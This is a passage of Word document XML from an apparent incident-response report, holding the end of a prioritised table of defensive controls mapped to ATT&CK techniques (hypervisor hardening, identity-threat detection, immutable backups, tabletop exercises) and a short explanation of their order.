              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6EB2BF26" w14:textId="50592FBE" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Breaks lateral movement (T1021) and separates the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> layer from general access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5A5C0D23" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="67366B09" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3F45D6AB" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="75492321" w14:textId="1757630D" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hypervisor hardening and dedicated monitoring of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/vCenter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="11D58DFF" w14:textId="2682DB46" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1486 Encryption target Under-monitored Protect the greatest impact asset.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48B51D6B" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="41F2FA57" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2DB517F4" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1764C3C2" w14:textId="2FE36583" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Identity-threat detection: alert on anomalous logins, MFA resets, NTDS access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FB6B455" w14:textId="54468EE2" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Closes the dwell-time detection gap that permitted months of presence without </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>detection.average</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6F30E5F6" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="0E18D0AC" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="217AABB5" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A19F8E5" w14:textId="5F76D755" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Validated offline/immutable backups and a drilled ransomware recovery play book</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="516E6798" w14:textId="42AB7752" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reduces multi-week outage cost; enables recovery without paying.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="13891C8C" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="6BA187B0" w14:textId="77777777" w:rsidTr="00E4676A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="846" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="690A1798" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3763" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="43381C80" w14:textId="44FC7A5C" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tabletop exercises and business-continuity planning for supply-chain dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3750" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5AAA451F" w14:textId="3BE30303" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00E4676A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Addresses the increased operational impact of a tightly connected, own-label supply chain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1001" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="512AA24F" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Low–Med</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0166937F" w14:textId="77777777" w:rsidR="00950431" w:rsidRPr="00796916" w:rsidRDefault="00950431">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc234776718"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The order is deliberate. The lowest cost, highest leverage controls (help-desk verification, phishing-resistant MFA) come first because they attack the actual entry point. The more expensive architectural changes (AD tiering, segmentation) address the escalation path that turned a foothold into a national-scale incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B747D61" w14:textId="4C5C0632" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.8 Task 1 Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="569D44B3" w14:textId="77777777" w:rsidR="00950431" w:rsidRPr="00796916" w:rsidRDefault="00950431">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc234776719"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
